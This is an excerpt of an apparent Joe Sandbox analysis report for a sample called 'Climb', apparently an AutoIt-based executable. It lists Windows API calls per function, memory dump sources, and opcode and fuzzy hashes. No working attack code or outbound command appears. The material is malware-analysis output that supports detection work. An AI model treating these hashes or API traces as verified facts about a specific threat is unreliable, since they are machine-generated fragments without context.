                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0011C6C4
                                                                                                                                                                          • IsMenu.USER32(00000000), ref: 0011C6E4
                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 0011C71A
                                                                                                                                                                          • GetMenuItemCount.USER32(00DEF7D8), ref: 0011C76B
                                                                                                                                                                          • InsertMenuItemW.USER32(00DEF7D8,?,00000001,00000030), ref: 0011C793
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                          • String ID: 0$2
                                                                                                                                                                          • API String ID: 93392585-3793063076
                                                                                                                                                                          • Opcode ID: 16757c2adf3ad0db1018cb129973a2129aaf135e47cc833ed4a0ded672e29087
                                                                                                                                                                          • Instruction ID: 51c0a8248d570f7b80af10deab04959e91949b740787a910263088f47e5c23d8
                                                                                                                                                                          • Opcode Fuzzy Hash: 16757c2adf3ad0db1018cb129973a2129aaf135e47cc833ed4a0ded672e29087
                                                                                                                                                                          • Instruction Fuzzy Hash: 26519E706402059BDF18CFB8D884BEEBBF5AF55314F24413AE9119B2E1D7B09981CFA1
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadIconW.USER32(00000000,00007F03), ref: 0011D1BE
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: IconLoad
                                                                                                                                                                          • String ID: blank$info$question$stop$warning
                                                                                                                                                                          • API String ID: 2457776203-404129466
                                                                                                                                                                          • Opcode ID: 638ef0f1eb2c17e2dafdca7eb757fa1748fdd8807a27e89199a5f8f484d968e3
                                                                                                                                                                          • Instruction ID: 6fb63af194de0c4fe102649fc9448191fa03412cfa5f80fc262cd405a563f77e
                                                                                                                                                                          • Opcode Fuzzy Hash: 638ef0f1eb2c17e2dafdca7eb757fa1748fdd8807a27e89199a5f8f484d968e3
                                                                                                                                                                          • Instruction Fuzzy Hash: CD11E93624C316BBEB0D5B54FC82DEA77FC9F05760F21003AF905A62C2E7B4AA804671
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                          • String ID: 0.0.0.0
                                                                                                                                                                          • API String ID: 642191829-3771769585
                                                                                                                                                                          • Opcode ID: 7484dfa6781eb253c5a9c22a297e8708a7fdf3a1a261f343bd9b0f833734f4dd
                                                                                                                                                                          • Instruction ID: 1ccd3015fb64afc571c025de0cd05d39cfc0a9e230054d57c2c4da51a1a67bcd
                                                                                                                                                                          • Opcode Fuzzy Hash: 7484dfa6781eb253c5a9c22a297e8708a7fdf3a1a261f343bd9b0f833734f4dd
                                                                                                                                                                          • Instruction Fuzzy Hash: 6B11DA355042157BDF28A7B0EC4AEEE77BCDF41715F0100BAF915A61A2EF748AC186A1
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$LocalTime
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 952045576-0
                                                                                                                                                                          • Opcode ID: 31d88ee49f7987805c1391d364fc11fac13fc2717b6b61d6aef19934ce242a97
                                                                                                                                                                          • Instruction ID: d758be67004f0d710e60205ef8f7ceb2b0a95ac2e6fccddb52d09461a1f63635
                                                                                                                                                                          • Opcode Fuzzy Hash: 31d88ee49f7987805c1391d364fc11fac13fc2717b6b61d6aef19934ce242a97
                                                                                                                                                                          • Instruction Fuzzy Hash: 0D418265C11214B6CB15EBF88C86ADFB7A8AF05310F518477E518E3262FB34E295C3E6
                                                                                                                                                                          APIs
                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 001437B7
                                                                                                                                                                          • GetDC.USER32(00000000), ref: 001437BF
                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 001437CA
                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 001437D6
                                                                                                                                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00143812
                                                                                                                                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00143823
                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00146504,?,?,000000FF,00000000,?,000000FF,?), ref: 0014385E
                                                                                                                                                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 0014387D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3864802216-0
                                                                                                                                                                          • Opcode ID: 0a632478e5f2845cb8dcdb203b4660a92d3cefad430c22ca9d8e84256a4a09cd
                                                                                                                                                                          • Instruction ID: a93fd44024c45764d5aadd69ed656ac122b20af9929bc31bd437d886791d241b
                                                                                                                                                                          • Opcode Fuzzy Hash: 0a632478e5f2845cb8dcdb203b4660a92d3cefad430c22ca9d8e84256a4a09cd
                                                                                                                                                                          • Instruction Fuzzy Hash: 5631A076201214BFEF254F50DC89FEB3BADEF4A715F044065FE089A1A1C6B59C81C7A0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                          • API String ID: 0-572801152
                                                                                                                                                                          • Opcode ID: a74bf6ff2d2f47b56b36e7f52f3fd1b474eb0eb5b2b77be58d24c97e91cb4c0c
                                                                                                                                                                          • Instruction ID: 86537f634af1204154eabbad92097e4adff1a6d66adcf9c26a591bf2e3330dba
                                                                                                                                                                          • Opcode Fuzzy Hash: a74bf6ff2d2f47b56b36e7f52f3fd1b474eb0eb5b2b77be58d24c97e91cb4c0c
                                                                                                                                                                          • Instruction Fuzzy Hash: 89D1C175A0070A9FDF14CFA8C885AAEB7B6FF48704F148069E915AB291E770DD81CB60
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,000F1B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 000F194E
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,000F1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 000F19D1
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,000F1B7B,?,000F1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 000F1A64
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,000F1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 000F1A7B
                                                                                                                                                                            • Part of subcall function 000E3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,000D6A79,?,0000015D,?,?,?,?,000D85B0,000000FF,00000000,?,?), ref: 000E3BC5
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,000F1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 000F1AF7
                                                                                                                                                                          • __freea.LIBCMT ref: 000F1B22
                                                                                                                                                                          • __freea.LIBCMT ref: 000F1B2E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2829977744-0
                                                                                                                                                                          • Opcode ID: 83101f5cae851559d60f15b7ea8a0a531ad6c715e617c32f916184aec7de28ed
                                                                                                                                                                          • Instruction ID: 738fe9423b0f47e2adf6a461e770bed90d02842992bbf461a715deb9aef141b6
                                                                                                                                                                          • Opcode Fuzzy Hash: 83101f5cae851559d60f15b7ea8a0a531ad6c715e617c32f916184aec7de28ed
                                                                                                                                                                          • Instruction Fuzzy Hash: 9391F472E0424EEADF218E64C891AFE7BF5AF09310F180119EA15E7541EB75CC41E7A0
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Variant$ClearInit
                                                                                                                                                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                          • API String ID: 2610073882-625585964
                                                                                                                                                                          • Opcode ID: cf0d9590d0abdf631281cb1b341308cb9a47289fe46dbaca3295e99c2de586ea
                                                                                                                                                                          • Instruction ID: fc5a087a391cef4584e8b65a44aa1b071e096aaaf710f5e49f69276e3a2dc1b5
                                                                                                                                                                          • Opcode Fuzzy Hash: cf0d9590d0abdf631281cb1b341308cb9a47289fe46dbaca3295e99c2de586ea
                                                                                                                                                                          • Instruction Fuzzy Hash: 49918B71A00619EBDF24CFA4C888FAFBBB9AF45B14F148519F515AB280D7709945CFA0
                                                                                                                                                                          APIs
                                                                                                                                                                          • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00121C1B
                                                                                                                                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00121C43
                                                                                                                                                                          • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00121C67
                                                                                                                                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00121C97
                                                                                                                                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00121D1E
                                                                                                                                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00121D83
                                                                                                                                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00121DEF
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2550207440-0
                                                                                                                                                                          • Opcode ID: 9267186e13a0098d06ca60b826f57530dbd0f4394c83a6c2728724468eb3a672
                                                                                                                                                                          • Instruction ID: 28ca15fcf34f2db17220913679b09cd6f79abcf2d392b0494550367a07b02a38
                                                                                                                                                                          • Opcode Fuzzy Hash: 9267186e13a0098d06ca60b826f57530dbd0f4394c83a6c2728724468eb3a672
                                                                                                                                                                          • Instruction Fuzzy Hash: 84910379A00229BFDB01DF94E884BFEB7B4FF65711F154029E900EB2A1D774A961CB90
                                                                                                                                                                          APIs
                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 001343C8
                                                                                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 001344D7
                                                                                                                                                                          • _wcslen.LIBCMT ref: 001344E7
                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 0013467C
                                                                                                                                                                            • Part of subcall function 0012169E: VariantInit.OLEAUT32(00000000), ref: 001216DE
                                                                                                                                                                            • Part of subcall function 0012169E: VariantCopy.OLEAUT32(?,?), ref: 001216E7
                                                                                                                                                                            • Part of subcall function 0012169E: VariantClear.OLEAUT32(?), ref: 001216F3
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                                                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                          • API String ID: 4137639002-1221869570
                                                                                                                                                                          • Opcode ID: b99d7b90f9f5f1bac53d13866a3b0a255809a6f3b3c4f75a7dddb83e8c7f4813
                                                                                                                                                                          • Instruction ID: fe9584b0f33902dfc0bbc910519054401af395fcdc86fdcdb6334d03f8fd746a
                                                                                                                                                                          • Opcode Fuzzy Hash: b99d7b90f9f5f1bac53d13866a3b0a255809a6f3b3c4f75a7dddb83e8c7f4813
                                                                                                                                                                          • Instruction Fuzzy Hash: EB915975A083019FC704DF24C4819AABBE5FF89714F14892DF89A9B352DB31ED46CB92
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 001108FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00110831,80070057,?,?,?,00110C4E), ref: 0011091B
                                                                                                                                                                            • Part of subcall function 001108FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00110831,80070057,?,?), ref: 00110936
                                                                                                                                                                            • Part of subcall function 001108FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00110831,80070057,?,?), ref: 00110944
                                                                                                                                                                            • Part of subcall function 001108FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00110831,80070057,?), ref: 00110954
                                                                                                                                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 001356AE
                                                                                                                                                                          • _wcslen.LIBCMT ref: 001357B6
                                                                                                                                                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0013582C
                                                                                                                                                                          • CoTaskMemFree.OLE32(?), ref: 00135837
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                                                          • String ID: NULL Pointer assignment
                                                                                                                                                                          • API String ID: 614568839-2785691316
                                                                                                                                                                          • Opcode ID: 4d97681e0f558f7edfbc6c8c10e54ad7ab6678237dfc413a9b4d49f018a9287b
                                                                                                                                                                          • Instruction ID: 8208fda655a068891dd7fb24d3c039872af316f7fc261ac7fcb6dde043324eac
                                                                                                                                                                          • Opcode Fuzzy Hash: 4d97681e0f558f7edfbc6c8c10e54ad7ab6678237dfc413a9b4d49f018a9287b
                                                                                                                                                                          • Instruction Fuzzy Hash: F3910571D00219EFDF14DFA4D881AEEBBB9BF08714F10456AE915AB251EB709A44CFA0
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetMenu.USER32(?), ref: 00142C1F
                                                                                                                                                                          • GetMenuItemCount.USER32(00000000), ref: 00142C51
                                                                                                                                                                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00142C79
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00142CAF
                                                                                                                                                                          • GetMenuItemID.USER32(?,?), ref: 00142CE9
                                                                                                                                                                          • GetSubMenu.USER32(?,?), ref: 00142CF7
                                                                                                                                                                            • Part of subcall function 00114393: GetWindowThreadProcessId.USER32(?,00000000), ref: 001143AD
                                                                                                                                                                            • Part of subcall function 00114393: GetCurrentThreadId.KERNEL32 ref: 001143B4
                                                                                                                                                                            • Part of subcall function 00114393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00112F00), ref: 001143BB
                                                                                                                                                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00142D7F
                                                                                                                                                                            • Part of subcall function 0011F292: Sleep.KERNEL32 ref: 0011F30A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4196846111-0
                                                                                                                                                                          • Opcode ID: 5ab02f59afd3817a5532910e57ae94e14336537ffadfad1513ed361be8ba307b
                                                                                                                                                                          • Instruction ID: bb28c19d1bffb54e580d8e9cd6503282c96c93903b595c5c8f9fa911497f553c
                                                                                                                                                                          • Opcode Fuzzy Hash: 5ab02f59afd3817a5532910e57ae94e14336537ffadfad1513ed361be8ba307b
                                                                                                                                                                          • Instruction Fuzzy Hash: AD717D75E00215AFCB14DFA4C885AEEB7B5EF48310F558469F816EB361DB34AD81CB90
                                                                                                                                                                          APIs
                                                                                                                                                                          • IsWindow.USER32(00000000), ref: 00148992
                                                                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 0014899E
                                                                                                                                                                          • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00148A79
                                                                                                                                                                          • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00148AAC
                                                                                                                                                                          • IsDlgButtonChecked.USER32(?,00000000), ref: 00148AE4
                                                                                                                                                                          • GetWindowLongW.USER32(00000000,000000EC), ref: 00148B06
                                                                                                                                                                          • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00148B1E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4072528602-0
                                                                                                                                                                          • Opcode ID: 02fd21d14e9bcb0125826aa048cacbbf3510ec491305d33e1d2feaf52490d880
                                                                                                                                                                          • Instruction ID: 23eb020ed78ccfbe6c8bab42702cfc8c6ff98a1a0c649b335fb98e5ad1eb0375
                                                                                                                                                                          • Opcode Fuzzy Hash: 02fd21d14e9bcb0125826aa048cacbbf3510ec491305d33e1d2feaf52490d880
                                                                                                                                                                          • Instruction Fuzzy Hash: D971AE74600605AFEF25DF54C884FBEBBB5FF49304F24046AE855A7271CB71A980DB61
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetParent.USER32(?), ref: 0011B8C0
                                                                                                                                                                          • GetKeyboardState.USER32(?), ref: 0011B8D5
                                                                                                                                                                          • SetKeyboardState.USER32(?), ref: 0011B936
                                                                                                                                                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 0011B964
                                                                                                                                                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 0011B983
